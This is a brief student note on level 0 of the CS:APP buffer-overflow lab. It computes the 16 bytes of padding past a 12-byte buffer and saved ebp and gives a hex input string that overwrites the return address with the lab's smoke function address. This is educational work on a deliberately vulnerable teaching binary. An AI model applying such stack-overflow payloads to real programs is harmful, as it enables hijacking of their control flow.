supersoda-ne/csapp_lab/lab3/note.md

 ## level 0: Candle
 Get address of smoke `08048e20 <smoke>:`.

 There is 12 bytes of space for `char buf[12]`, and 4 bytes for `saved ebp`, so we need 16 bytes of padding before smoke address.
-Remember to use litte-endian.

 `00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 8e 04 08`